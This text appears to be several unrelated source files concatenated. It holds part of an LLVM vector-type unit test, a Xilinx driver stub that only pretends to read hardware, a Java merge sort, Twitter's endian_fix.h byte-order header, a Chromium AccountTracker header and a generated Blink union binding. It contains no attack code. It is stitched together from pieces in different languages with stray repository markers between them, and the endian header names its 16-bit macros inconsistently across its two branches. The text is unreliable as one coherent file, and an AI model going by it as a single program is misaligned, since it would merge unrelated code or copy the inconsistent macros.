EXPECT_EQ(V8Int64Ty->getNumElements(), 8U); EXPECT_EQ(V8Int64Ty->getElementType()->getScalarSizeInBits(), 64U); auto *V4Float64Ty = dyn_cast<FixedVectorType>(VectorType::get(Float64Ty, EltCnt)); ASSERT_NE(nullptr, V4Float64Ty); EXPECT_EQ(V4Float64Ty->getNumElements(), 4U); EXPECT_EQ(V4Float64Ty->getElementType()->getScalarSizeInBits(), 64U); auto *ExtTy = dyn_cast<FixedVectorType>( VectorType::getExtendedElementVectorType(V8Int16Ty)); EXPECT_VTY_EQ(ExtTy, V8Int32Ty); 
EXPECT_EQ(ExtTy->getNumElements(), 8U); EXPECT_EQ(ExtTy->getElementType()->getScalarSizeInBits(), 32U); auto *TruncTy = dyn_cast<FixedVectorType>( VectorType::getTruncatedElementVectorType(V8Int32Ty)); EXPECT_VTY_EQ(TruncTy, V8Int16Ty); EXPECT_EQ(TruncTy->getNumElements(), 8U); EXPECT_EQ(TruncTy->getElementType()->getScalarSizeInBits(), 16U); auto *HalvedTy = dyn_cast<FixedVectorType>( VectorType::getHalfElementsVectorType(V4Int64Ty)); EXPECT_VTY_EQ(HalvedTy, V2Int64Ty); EXPECT_EQ(HalvedTy->getNumElements(), 2U); EXPECT_EQ(HalvedTy->getElementType()->getScalarSizeInBits(), 64U); auto *DoubledTy = dyn_cast<FixedVectorType>( VectorType::getDoubleElementsVectorType(V4Int64Ty)); EXPECT_VTY_EQ(DoubledTy, V8Int64Ty); EXPECT_EQ(DoubledTy->getNumElements(), 8U); EXPECT_EQ(DoubledTy->getElementType()->getScalarSizeInBits(), 64U); auto *ConvTy = dyn_cast<FixedVectorType>(VectorType::getInteger(V4Float64Ty)); EXPECT_VTY_EQ(ConvTy, V4Int64Ty); EXPECT_EQ(ConvTy->getNumElements(), 4U); EXPECT_EQ(ConvTy->getElementType()->getScalarSizeInBits(), 64U); EltCnt = V8Int64Ty->getElementCount(); EXPECT_EQ(EltCnt.getKnownMinValue(), 8U); ASSERT_FALSE(EltCnt.isScalable()); } TEST(VectorTypesTest, Scalable) { LLVMContext Ctx; Type *Int8Ty = Type::getInt8Ty(Ctx); Type *Int16Ty = Type::getInt16Ty(Ctx); Type *Int32Ty = Type::getInt32Ty(Ctx); Type *Int64Ty = Type::getInt64Ty(Ctx); Type *Float64Ty = Type::getDoubleTy(Ctx); auto *ScV16Int8Ty = ScalableVectorType::get(Int8Ty, 16); ASSERT_NE(nullptr, ScV16Int8Ty); EXPECT_EQ(ScV16Int8Ty->getMinNumElements(), 16U); EXPECT_EQ(ScV16Int8Ty->getScalarSizeInBits(), 8U); auto *ScV8Int32Ty = dyn_cast<ScalableVectorType>(VectorType::get(Int32Ty, 8, true)); ASSERT_NE(nullptr, ScV8Int32Ty); EXPECT_EQ(ScV8Int32Ty->getMinNumElements(), 8U); EXPECT_EQ(ScV8Int32Ty->getElementType()->getScalarSizeInBits(), 32U); auto *ScV8Int8Ty = dyn_cast<ScalableVectorType>(VectorType::get(Int8Ty, ScV8Int32Ty)); EXPECT_VTY_NE(ScV8Int32Ty, ScV8Int8Ty); EXPECT_EQ(ScV8Int8Ty->getElementCount(), ScV8Int32Ty->getElementCount()); EXPECT_EQ(ScV8Int8Ty->getElementType()->getScalarSizeInBits(), 8U); auto *ScV8Int32Ty2 = dyn_cast<ScalableVectorType>(VectorType::get(Int32Ty, ScV8Int32Ty)); EXPECT_VTY_EQ(ScV8Int32Ty, ScV8Int32Ty2); auto *ScV8Int16Ty = dyn_cast<ScalableVectorType>( VectorType::get(Int16Ty, ElementCount::getScalable(8))); ASSERT_NE(nullptr, ScV8Int16Ty); EXPECT_EQ(ScV8Int16Ty->getMinNumElements(), 8U); EXPECT_EQ(ScV8Int16Ty->getElementType()->getScalarSizeInBits(), 16U); auto EltCnt = ElementCount::getScalable(4); auto *ScV4Int64Ty = dyn_cast<ScalableVectorType>(VectorType::get(Int64Ty, EltCnt)); ASSERT_NE(nullptr, ScV4Int64Ty); EXPECT_EQ(ScV4Int64Ty->getMinNumElements(), 4U); EXPECT_EQ(ScV4Int64Ty->getElementType()->getScalarSizeInBits(), 64U); auto *ScV2Int64Ty = dyn_cast<ScalableVectorType>( VectorType::get(Int64Ty, EltCnt.divideCoefficientBy(2))); ASSERT_NE(nullptr, ScV2Int64Ty); EXPECT_EQ(ScV2Int64Ty->getMinNumElements(), 2U); EXPECT_EQ(ScV2Int64Ty->getElementType()->getScalarSizeInBits(), 64U); auto *ScV8Int64Ty = dyn_cast<ScalableVectorType>(VectorType::get(Int64Ty, EltCnt * 2)); ASSERT_NE(nullptr, ScV8Int64Ty); EXPECT_EQ(ScV8Int64Ty->getMinNumElements(), 8U); EXPECT_EQ(ScV8Int64Ty->getElementType()->getScalarSizeInBits(), 64U); auto *ScV4Float64Ty = dyn_cast<ScalableVectorType>(VectorType::get(Float64Ty, EltCnt)); ASSERT_NE(nullptr, ScV4Float64Ty); EXPECT_EQ(ScV4Float64Ty->getMinNumElements(), 4U); EXPECT_EQ(ScV4Float64Ty->getElementType()->getScalarSizeInBits(), 64U); auto *ExtTy = 
dyn_cast<ScalableVectorType>( VectorType::getExtendedElementVectorType(ScV8Int16Ty)); EXPECT_VTY_EQ(ExtTy, ScV8Int32Ty); EXPECT_EQ(ExtTy->getMinNumElements(), 8U); EXPECT_EQ(ExtTy->getElementType()->getScalarSizeInBits(), 32U); auto *TruncTy = dyn_cast<ScalableVectorType>( VectorType::getTruncatedElementVectorType(ScV8Int32Ty)); EXPECT_VTY_EQ(TruncTy, ScV8Int16Ty); EXPECT_EQ(TruncTy->getMinNumElements(), 8U); EXPECT_EQ(TruncTy->getElementType()->getScalarSizeInBits(), 16U); auto *HalvedTy = dyn_cast<ScalableVectorType>( VectorType::getHalfElementsVectorType(ScV4Int64Ty)); EXPECT_VTY_EQ(HalvedTy, ScV2Int64Ty); EXPECT_EQ(HalvedTy->getMinNumElements(), 2U); EXPECT_EQ(HalvedTy->getElementType()->getScalarSizeInBits(), 64U); auto *DoubledTy = dyn_cast<ScalableVectorType>( VectorType::getDoubleElementsVectorType(ScV4Int64Ty)); EXPECT_VTY_EQ(DoubledTy, ScV8Int64Ty); EXPECT_EQ(DoubledTy->getMinNumElements(), 8U); EXPECT_EQ(DoubledTy->getElementType()->getScalarSizeInBits(), 64U); auto *ConvTy = dyn_cast<ScalableVectorType>(VectorType::getInteger(ScV4Float64Ty)); EXPECT_VTY_EQ(ConvTy, ScV4Int64Ty); EXPECT_EQ(ConvTy->getMinNumElements(), 4U); EXPECT_EQ(ConvTy->getElementType()->getScalarSizeInBits(), 64U); EltCnt = ScV8Int64Ty->getElementCount(); EXPECT_EQ(EltCnt.getKnownMinValue(), 8U); ASSERT_TRUE(EltCnt.isScalable()); } TEST(VectorTypesTest, BaseVectorType) { LLVMContext Ctx; Type *Int16Ty = Type::getInt16Ty(Ctx); Type *Int32Ty = Type::getInt32Ty(Ctx); std::array<VectorType *, 8> VTys = { VectorType::get(Int16Ty, ElementCount::getScalable(4)), VectorType::get(Int16Ty, ElementCount::getFixed(4)), VectorType::get(Int16Ty, ElementCount::getScalable(2)), VectorType::get(Int16Ty, ElementCount::getFixed(2)), VectorType::get(Int32Ty, ElementCount::getScalable(4)), VectorType::get(Int32Ty, ElementCount::getFixed(4)), VectorType::get(Int32Ty, ElementCount::getScalable(2)), VectorType::get(Int32Ty, ElementCount::getFixed(2))}; /* The comparison matrix is symmetric, so we only check the upper triangle: (0,0) (0,1) (0,2) ... (0,7) (1,0) (1,1) (1,2) . (2,0) (2,1) (2,2) . . . . . . . . (7,0) ... 
(7,7) */ for (size_t I = 0, IEnd = VTys.size(); I < IEnd; ++I) { // test I == J VectorType *VI = VTys[I]; ElementCount ECI = VI->getElementCount(); EXPECT_EQ(isa<ScalableVectorType>(VI), ECI.isScalable()); for (size_t J = I + 1, JEnd = VTys.size(); J < JEnd; ++J) { // test I < J VectorType *VJ = VTys[J]; EXPECT_VTY_NE(VI, VJ); VectorType *VJPrime = VectorType::get(VI->getElementType(), VJ); if (VI->getElementType() == VJ->getElementType()) { EXPECT_VTY_EQ(VJ, VJPrime); } else { EXPECT_VTY_NE(VJ, VJPrime); } EXPECT_EQ(VJ->getTypeID(), VJPrime->getTypeID()) << "VJ and VJPrime are the same sort of vector"; } } } TEST(VectorTypesTest, FixedLenComparisons) { LLVMContext Ctx; DataLayout DL(""); Type *Int32Ty = Type::getInt32Ty(Ctx); Type *Int64Ty = Type::getInt64Ty(Ctx); auto *V2Int32Ty = FixedVectorType::get(Int32Ty, 2); auto *V4Int32Ty = FixedVectorType::get(Int32Ty, 4); auto *V2Int64Ty = FixedVectorType::get(Int64Ty, 2); TypeSize V2I32Len = V2Int32Ty->getPrimitiveSizeInBits(); EXPECT_EQ(V2I32Len.getKnownMinSize(), 64U); EXPECT_FALSE(V2I32Len.isScalable()); EXPECT_LT(V2Int32Ty->getPrimitiveSizeInBits().getFixedSize(), V4Int32Ty->getPrimitiveSizeInBits().getFixedSize()); EXPECT_GT(V2Int64Ty->getPrimitiveSizeInBits().getFixedSize(), V2Int32Ty->getPrimitiveSizeInBits().getFixedSize()); EXPECT_EQ(V4Int32Ty->getPrimitiveSizeInBits(), V2Int64Ty->getPrimitiveSizeInBits()); EXPECT_NE(V2Int32Ty->getPrimitiveSizeInBits(), V2Int64Ty->getPrimitiveSizeInBits()); // Check that a fixed-only comparison works for fixed size vectors. EXPECT_EQ(V2Int64Ty->getPrimitiveSizeInBits().getFixedSize(), V4Int32Ty->getPrimitiveSizeInBits().getFixedSize()); // Check the DataLayout interfaces. EXPECT_EQ(DL.getTypeSizeInBits(V2Int64Ty), DL.getTypeSizeInBits(V4Int32Ty)); EXPECT_EQ(DL.getTypeSizeInBits(V2Int32Ty), 64U); EXPECT_EQ(DL.getTypeSizeInBits(V2Int64Ty), 128U); EXPECT_EQ(DL.getTypeStoreSize(V2Int64Ty), DL.getTypeStoreSize(V4Int32Ty)); EXPECT_NE(DL.getTypeStoreSizeInBits(V2Int32Ty), DL.getTypeStoreSizeInBits(V2Int64Ty)); EXPECT_EQ(DL.getTypeStoreSizeInBits(V2Int32Ty), 64U); EXPECT_EQ(DL.getTypeStoreSize(V2Int64Ty), 16U); EXPECT_EQ(DL.getTypeAllocSize(V4Int32Ty), DL.getTypeAllocSize(V2Int64Ty)); EXPECT_NE(DL.getTypeAllocSizeInBits(V2Int32Ty), DL.getTypeAllocSizeInBits(V2Int64Ty)); EXPECT_EQ(DL.getTypeAllocSizeInBits(V4Int32Ty), 128U); EXPECT_EQ(DL.getTypeAllocSize(V2Int32Ty), 8U); ASSERT_TRUE(DL.typeSizeEqualsStoreSize(V4Int32Ty)); } TEST(VectorTypesTest, ScalableComparisons) { LLVMContext Ctx; DataLayout DL(""); Type *Int32Ty = Type::getInt32Ty(Ctx); Type *Int64Ty = Type::getInt64Ty(Ctx); auto *ScV2Int32Ty = ScalableVectorType::get(Int32Ty, 2); auto *ScV4Int32Ty = ScalableVectorType::get(Int32Ty, 4); auto *ScV2Int64Ty = ScalableVectorType::get(Int64Ty, 2); TypeSize ScV2I32Len = ScV2Int32Ty->getPrimitiveSizeInBits(); EXPECT_EQ(ScV2I32Len.getKnownMinSize(), 64U); EXPECT_TRUE(ScV2I32Len.isScalable()); EXPECT_LT(ScV2Int32Ty->getPrimitiveSizeInBits().getKnownMinSize(), ScV4Int32Ty->getPrimitiveSizeInBits().getKnownMinSize()); EXPECT_GT(ScV2Int64Ty->getPrimitiveSizeInBits().getKnownMinSize(), ScV2Int32Ty->getPrimitiveSizeInBits().getKnownMinSize()); EXPECT_EQ(ScV4Int32Ty->getPrimitiveSizeInBits().getKnownMinSize(), ScV2Int64Ty->getPrimitiveSizeInBits().getKnownMinSize()); EXPECT_NE(ScV2Int32Ty->getPrimitiveSizeInBits().getKnownMinSize(), ScV2Int64Ty->getPrimitiveSizeInBits().getKnownMinSize()); // Check the DataLayout interfaces. 
EXPECT_EQ(DL.getTypeSizeInBits(ScV2Int64Ty), DL.getTypeSizeInBits(ScV4Int32Ty)); EXPECT_EQ(DL.getTypeSizeInBits(ScV2Int32Ty).getKnownMinSize(), 64U); EXPECT_EQ(DL.getTypeStoreSize(ScV2Int64Ty), DL.getTypeStoreSize(ScV4Int32Ty)); EXPECT_NE(DL.getTypeStoreSizeInBits(ScV2Int32Ty), DL.getTypeStoreSizeInBits(ScV2Int64Ty)); EXPECT_EQ(DL.getTypeStoreSizeInBits(ScV2Int32Ty).getKnownMinSize(), 64U); EXPECT_EQ(DL.getTypeStoreSize(ScV2Int64Ty).getKnownMinSize(), 16U); EXPECT_EQ(DL.getTypeAllocSize(ScV4Int32Ty), DL.getTypeAllocSize(ScV2Int64Ty)); EXPECT_NE(DL.getTypeAllocSizeInBits(ScV2Int32Ty), DL.getTypeAllocSizeInBits(ScV2Int64Ty)); EXPECT_EQ(DL.getTypeAllocSizeInBits(ScV4Int32Ty).getKnownMinSize(), 128U); EXPECT_EQ(DL.getTypeAllocSize(ScV2Int32Ty).getKnownMinSize(), 8U); ASSERT_TRUE(DL.typeSizeEqualsStoreSize(ScV4Int32Ty)); } TEST(VectorTypesTest, CrossComparisons) { LLVMContext Ctx; Type *Int32Ty = Type::getInt32Ty(Ctx); auto *V4Int32Ty = FixedVectorType::get(Int32Ty, 4); auto *ScV4Int32Ty = ScalableVectorType::get(Int32Ty, 4); // Even though the minimum size is the same, a scalable vector could be // larger so we don't consider them to be the same size. EXPECT_NE(V4Int32Ty->getPrimitiveSizeInBits(), ScV4Int32Ty->getPrimitiveSizeInBits()); // If we are only checking the minimum, then they are the same size. EXPECT_EQ(V4Int32Ty->getPrimitiveSizeInBits().getKnownMinSize(), ScV4Int32Ty->getPrimitiveSizeInBits().getKnownMinSize()); // We can't use ordering comparisons (<,<=,>,>=) between scalable and // non-scalable vector sizes. } } // end anonymous namespace
/* -- (c) Copyright 2014 Xilinx, Inc. All rights reserved. -- -- This file contains confidential and proprietary information -- of Xilinx, Inc. and is protected under U.S. and -- international copyright and other intellectual property -- laws. -- -- DISCLAIMER -- This disclaimer is not a license and does not grant any -- rights to the materials distributed herewith. Except as -- otherwise provided in a valid license issued to you by -- Xilinx, and to the maximum extent permitted by applicable -- law: (1) THESE MATERIALS ARE MADE AVAILABLE "AS IS" AND -- WITH ALL FAULTS, AND XILINX HEREBY DISCLAIMS ALL WARRANTIES -- AND CONDITIONS, EXPRESS, IMPLIED, OR STATUTORY, INCLUDING -- BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY, NON- -- INFRINGEMENT, OR FITNESS FOR ANY PARTICULAR PURPOSE; and -- (2) Xilinx shall not be liable (whether in contract or tort, -- including negligence, or under any other theory of -- liability) for any loss or damage of any kind or nature -- related to, arising under or in connection with these -- materials, including for any direct, or any indirect, -- special, incidental, or consequential loss or damage -- (including loss of data, profits, goodwill, or any type of -- loss or damage suffered as a result of any action brought -- by a third party) even if such damage or loss was -- reasonably foreseeable or Xilinx had been advised of the -- possibility of the same. -- -- CRITICAL APPLICATIONS -- Xilinx products are not designed or intended to be fail- -- safe, or for use in any application requiring fail-safe -- performance, such as life-support or safety devices or -- systems, Class III medical devices, nuclear facilities, -- applications related to the deployment of airbags, or any -- other applications that could lead to death, personal -- injury, or severe property or environmental damage -- (individually and collectively, "Critical -- Applications"). Customer assumes the sole risk and -- liability of any use of Xilinx products in Critical -- Applications, subject only to applicable laws and -- regulations governing limitations on product liability. -- -- THIS COPYRIGHT NOTICE AND DISCLAIMER MUST BE RETAINED AS -- PART OF THIS FILE AT ALL TIMES. 
*/

//provides the same functionality as the real uDriver, but
//instead of talking to hardware it just pretends
#include "uDriver.h"

uDriver::uDriver(char* devFileName){
    //could fork a new process here that simulates the hardware
};

uDriver::~uDriver(){
};

int uDriver::ReadReg(int offset){
    mtx.lock();
    int r=1000;
    for(int i=1;i<200000;i++) r/=i;   // busy-wait filler; i starts at 1 so we never divide by zero
    mtx.unlock();
    return r;
};

void uDriver::WriteReg(int offset, int wdata){
    mtx.lock();
    int r=349;
    for(int i=1;i<200000;i++) r/=i;   // busy-wait filler; i starts at 1 so we never divide by zero
    mtx.unlock();
};

int uDriver::WriteData(char* buff, int size){
    mtx.lock();
    int r=345;
    for(int i=1;i<200000;i++) r/=i;   // busy-wait filler; i starts at 1 so we never divide by zero
    mtx.unlock();
    return 0;
};

int uDriver::ReadData(char *buff, int size){
    mtx.lock();
    int r=3234444;
    for(int i=1;i<200000;i++) r/=i;   // busy-wait filler; i starts at 1 so we never divide by zero
    mtx.unlock();
    return 0;
};

void uDriver::WriteFree(free_regs_t which, uint32_t value){
    //WriteReg(0x30+4*which,value);
};

bool uDriver::ReadFree(free_regs_t which, uint32_t &ret){
    // ret=ReadReg(0x30+4*which);
    // return 0x80000000&ret;
    ret=0xf5ee0000+which;
    return false;
};

bool uDriver::ReadDel(uint32_t &ret){
    // ret=ReadReg(0x20);
    // return 0x80000000&ret;
    ret=0xde100000;
    return false;   // stub result, mirroring the ReadFree fake above
};

uint32_t uDriver::ReadStats_precise(stats_reg_t which){
    // return ReadReg(0x00+4*which);
    return 0x0000ffff;
};

double uDriver::ReadStats_percent(stats_reg_t which){
    uint32_t maxval=(1<<22)-1;                      // largest 22-bit value
    uint32_t exact_val=ReadStats_precise(which);
    return (double)exact_val/maxval*100;            // percentage of full scale for the value just read
};

bool uDriver::isFlushReq(){
    return false;
};

void uDriver::sendFlushAck(){
};

bool uDriver::isFlushDone(){
    return true;   // stub: assume the simulated flush completes immediately
};

void uDriver::softwareControlledReset(){
};

uint32_t uDriver::ReadRev(){
    // return ReadReg(0xf0);
    return 99;
};
/* * Written by: <NAME> * Last Update: December 29, 2013 */ public class MergeSort { /* * Inputs: * array - An array containing a sequence of integers. * start / end - The range that you want to sort. * * Output: * Although the function is void the original array will be sorted in the specified range. */ public static void mergeSort(int[] array, int start, int end){ if (start < end){ int middle = (end + start) / 2; mergeSort(array, start, middle); mergeSort(array, middle + 1, end); merge(array,start,middle,end); } } private static void merge(int[]array, int start, int middle, int end){ int size_1 = middle - start + 1; int size_2 = end - middle; int[] leftArray = new int[size_1]; int[] rightArray = new int[size_2]; for(int i = 0; i < size_1; i++){ leftArray[i] = array[start + i]; } for(int j = 0; j < size_2; j++){ rightArray[j] = array[j + middle + 1]; } int i = 0; int j = 0; for(int k = start; k <= end; k++){ if(i == size_1){ array[k] = rightArray[j]; j++; continue; } if(j == size_2){ array[k] = leftArray[i]; i++; continue; } if(leftArray[i] <= rightArray[j]){ array[k] = leftArray[i]; i++; }else{ array[k] = rightArray[j]; j++; } } } }
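// A minimal usage sketch (hypothetical, not part of the original class): sorts a small array
// in place with the MergeSort.mergeSort method above; note that the end index is inclusive.
class MergeSortDemo {
    public static void main(String[] args) {
        int[] values = {5, 1, 4, 2, 3};
        MergeSort.mergeSort(values, 0, values.length - 1);      // sort the whole array, end index inclusive
        System.out.println(java.util.Arrays.toString(values));  // prints [1, 2, 3, 4, 5]
    }
}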
<gh_stars>100-1000 /* * MIT License * * Copyright (c) 2017 Twitter * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ // // endian_fix.h // ImageCore // // For OSes that use glibc < 2.9 (like RHEL5) // #pragma once #ifdef __APPLE__ #include <libkern/OSByteOrder.h> #define htobe16(x) OSSwapHostToBigInt16(x) #define htole16(x) OSSwapHostToLittleInt16(x) #define betoh16(x) OSSwapBigToHostInt16(x) #define letoh16(x) OSSwapLittleToHostInt16(x) #define htobe32(x) OSSwapHostToBigInt32(x) #define htole32(x) OSSwapHostToLittleInt32(x) #define betoh32(x) OSSwapBigToHostInt32(x) #define letoh32(x) OSSwapLittleToHostInt32(x) #define htobe64(x) OSSwapHostToBigInt64(x) #define htole64(x) OSSwapHostToLittleInt64(x) #define betoh64(x) OSSwapBigToHostInt64(x) #define letoh64(x) OSSwapLittleToHostInt64(x) #else #include <endian.h> #if defined(__USE_BSD) || defined(__USE_GNU) /* Conversion interfaces. */ #include <byteswap.h> #if __BYTE_ORDER == __LITTLE_ENDIAN #ifndef htobe16 #define htobe16(x) __bswap_16(x) #endif #ifndef htole16 #define htole16(x) (x) #endif #ifndef betoh16 #define betoh16(x) __bswap_16(x) #endif #ifndef letoh16 #define letoh16(x) (x) #endif #ifndef htobe32 #define htobe32(x) __bswap_32(x) #endif #ifndef htole32 #define htole32(x) (x) #endif #ifndef betoh32 #define betoh32(x) __bswap_32(x) #endif #ifndef letoh32 #define letoh32(x) (x) #endif #ifndef htobe64 #define htobe64(x) __bswap_64(x) #endif #ifndef htole64 #define htole64(x) (x) #endif #ifndef betoh64 #define betoh64(x) __bswap_64(x) #endif #ifndef letoh64 #define letoh64(x) (x) #endif #else /* __BYTE_ORDER == __LITTLE_ENDIAN */ #ifndef htobe16 #define htobe16(x) (x) #endif #ifndef htole16 #define htole16(x) __bswap_16(x) #endif #ifndef be16toh #define be16toh(x) (x) #endif #ifndef le16toh #define le16toh(x) __bswap_16(x) #endif #ifndef htobe32 #define htobe32(x) (x) #endif #ifndef htole32 #define htole32(x) __bswap_32(x) #endif #ifndef betoh32 #define betoh32(x) (x) #endif #ifndef letoh32 #define letoh32(x) __bswap_32(x) #endif #ifndef htobe64 #define htobe64(x) (x) #endif #ifndef htole64 #define htole64(x) __bswap_64(x) #endif #ifndef betoh64 #define betoh64(x) (x) #endif #ifndef letoh64 #define letoh64(x) __bswap_64(x) #endif #endif /* __BYTE_ORDER == __LITTLE_ENDIAN */ #endif /* __USE_BSD || __USE_GNU */ #endif /* __APPLE__ */
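/* A minimal usage sketch (hypothetical, not part of the original header): byte-swaps a known
 * constant through the macros defined above. The include path "endian_fix.h" is an assumption
 * about where this header lives in the tree. */
#include <stdio.h>
#include <stdint.h>
#include "endian_fix.h"

int main(void) {
    uint32_t host = 0x11223344u;
    printf("host:  0x%08x\n", (unsigned) host);
    printf("be32:  0x%08x\n", (unsigned) htobe32(host)); /* 0x44332211 on a little-endian machine */
    printf("le32:  0x%08x\n", (unsigned) htole32(host)); /* unchanged on a little-endian machine */
    return 0;
}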
<gh_stars>1000+ // Copyright 2014 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef COMPONENTS_GCM_DRIVER_ACCOUNT_TRACKER_H_ #define COMPONENTS_GCM_DRIVER_ACCOUNT_TRACKER_H_ #include <map> #include <memory> #include <string> #include <vector> #include "base/observer_list.h" #include "components/signin/core/browser/signin_manager.h" #include "google_apis/gaia/gaia_oauth_client.h" #include "google_apis/gaia/oauth2_token_service.h" class GoogleServiceAuthError; class ProfileOAuth2TokenService; namespace net { class URLRequestContextGetter; } namespace gcm { struct AccountIds { std::string account_key; // The account ID used by OAuth2TokenService. std::string gaia; std::string email; }; class AccountIdFetcher; // The AccountTracker keeps track of what accounts exist on the // profile and the state of their credentials. The tracker fetches the // gaia ID of each account it knows about. // // The AccountTracker maintains these invariants: // 1. Events are only fired after the gaia ID has been fetched. // 2. Add/Remove and SignIn/SignOut pairs are always generated in order. // 3. SignIn follows Add, and there will be a SignOut between SignIn & Remove. // 4. If there is no primary account, there are no other accounts. class AccountTracker : public OAuth2TokenService::Observer, public SigninManagerBase::Observer { public: AccountTracker(SigninManagerBase* signin_manager, ProfileOAuth2TokenService* token_service, net::URLRequestContextGetter* request_context_getter); ~AccountTracker() override; class Observer { public: virtual void OnAccountSignInChanged(const AccountIds& ids, bool is_signed_in) = 0; }; void Shutdown(); void AddObserver(Observer* observer); void RemoveObserver(Observer* observer); // Returns the list of accounts that are signed in, and for which gaia IDs // have been fetched. The primary account for the profile will be first // in the vector. Additional accounts will be in order of their gaia IDs. std::vector<AccountIds> GetAccounts() const; // Indicates if all user information has been fetched. If the result is false, // there are still unfinished fetchers. virtual bool IsAllUserInfoFetched() const; private: friend class AccountIdFetcher; struct AccountState { AccountIds ids; bool is_signed_in; }; // OAuth2TokenService::Observer implementation. void OnRefreshTokenAvailable(const std::string& account_key) override; void OnRefreshTokenRevoked(const std::string& account_key) override; void OnUserInfoFetchSuccess(AccountIdFetcher* fetcher, const std::string& gaia_id); void OnUserInfoFetchFailure(AccountIdFetcher* fetcher); // SigninManagerBase::Observer implementation. void GoogleSigninSucceeded(const std::string& account_id, const std::string& username) override; void GoogleSignedOut(const std::string& account_id, const std::string& username) override; void NotifySignInChanged(const AccountState& account); void UpdateSignInState(const std::string& account_key, bool is_signed_in); void StartTrackingAccount(const std::string& account_key); // Note: |account_key| is passed by value here, because the original // object may be stored in |accounts_| and if so, it will be destroyed // after erasing the key from the map. 
void StopTrackingAccount(const std::string account_key); void StopTrackingAllAccounts(); void StartFetchingUserInfo(const std::string& account_key); void DeleteFetcher(AccountIdFetcher* fetcher); SigninManagerBase* signin_manager_; ProfileOAuth2TokenService* token_service_; scoped_refptr<net::URLRequestContextGetter> request_context_getter_; std::map<std::string, std::unique_ptr<AccountIdFetcher>> user_info_requests_; std::map<std::string, AccountState> accounts_; base::ObserverList<Observer> observer_list_; bool shutdown_called_; }; class AccountIdFetcher : public OAuth2TokenService::Consumer, public gaia::GaiaOAuthClient::Delegate { public: AccountIdFetcher(OAuth2TokenService* token_service, net::URLRequestContextGetter* request_context_getter, AccountTracker* tracker, const std::string& account_key); ~AccountIdFetcher() override; const std::string& account_key() { return account_key_; } void Start(); // OAuth2TokenService::Consumer implementation. void OnGetTokenSuccess(const OAuth2TokenService::Request* request, const std::string& access_token, const base::Time& expiration_time) override; void OnGetTokenFailure(const OAuth2TokenService::Request* request, const GoogleServiceAuthError& error) override; // gaia::GaiaOAuthClient::Delegate implementation. void OnGetUserIdResponse(const std::string& gaia_id) override; void OnOAuthError() override; void OnNetworkError(int response_code) override; private: OAuth2TokenService* token_service_; net::URLRequestContextGetter* request_context_getter_; AccountTracker* tracker_; const std::string account_key_; std::unique_ptr<OAuth2TokenService::Request> login_token_request_; std::unique_ptr<gaia::GaiaOAuthClient> gaia_oauth_client_; }; } // namespace gcm #endif // COMPONENTS_GCM_DRIVER_ACCOUNT_TRACKER_H_
// Copyright 2014 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. // This file has been auto-generated from the Jinja2 template // third_party/blink/renderer/bindings/templates/union_container.cpp.tmpl // by the script code_generator_v8.py. // DO NOT MODIFY! // clang-format off #include "third_party/blink/renderer/bindings/tests/results/core/double_or_string.h" #include "third_party/blink/renderer/bindings/core/v8/idl_types.h" #include "third_party/blink/renderer/bindings/core/v8/native_value_traits_impl.h" #include "third_party/blink/renderer/bindings/core/v8/to_v8_for_core.h" namespace blink { DoubleOrString::DoubleOrString() : type_(SpecificType::kNone) {} double DoubleOrString::GetAsDouble() const { DCHECK(IsDouble()); return double_; } void DoubleOrString::SetDouble(double value) { DCHECK(IsNull()); double_ = value; type_ = SpecificType::kDouble; } DoubleOrString DoubleOrString::FromDouble(double value) { DoubleOrString container; container.SetDouble(value); return container; } const String& DoubleOrString::GetAsString() const { DCHECK(IsString()); return string_; } void DoubleOrString::SetString(const String& value) { DCHECK(IsNull()); string_ = value; type_ = SpecificType::kString; } DoubleOrString DoubleOrString::FromString(const String& value) { DoubleOrString container; container.SetString(value); return container; } DoubleOrString::DoubleOrString(const DoubleOrString&) = default; DoubleOrString::~DoubleOrString() = default; DoubleOrString& DoubleOrString::operator=(const DoubleOrString&) = default; void DoubleOrString::Trace(blink::Visitor* visitor) { } void V8DoubleOrString::ToImpl(v8::Isolate* isolate, v8::Local<v8::Value> v8Value, DoubleOrString& impl, UnionTypeConversionMode conversionMode, ExceptionState& exceptionState) { if (v8Value.IsEmpty()) return; if (conversionMode == UnionTypeConversionMode::kNullable && IsUndefinedOrNull(v8Value)) return; if (v8Value->IsNumber()) { double cppValue = NativeValueTraits<IDLDouble>::NativeValue(isolate, v8Value, exceptionState); if (exceptionState.HadException()) return; impl.SetDouble(cppValue); return; } { V8StringResource<> cppValue = v8Value; if (!cppValue.Prepare(exceptionState)) return; impl.SetString(cppValue); return; } } v8::Local<v8::Value> ToV8(const DoubleOrString& impl, v8::Local<v8::Object> creationContext, v8::Isolate* isolate) { switch (impl.type_) { case DoubleOrString::SpecificType::kNone: return v8::Null(isolate); case DoubleOrString::SpecificType::kDouble: return v8::Number::New(isolate, impl.GetAsDouble()); case DoubleOrString::SpecificType::kString: return V8String(isolate, impl.GetAsString()); default: NOTREACHED(); } return v8::Local<v8::Value>(); } DoubleOrString NativeValueTraits<DoubleOrString>::NativeValue(v8::Isolate* isolate, v8::Local<v8::Value> value, ExceptionState& exceptionState) { DoubleOrString impl; V8DoubleOrString::ToImpl(isolate, value, impl, UnionTypeConversionMode::kNotNullable, exceptionState); return impl; } } // namespace blink
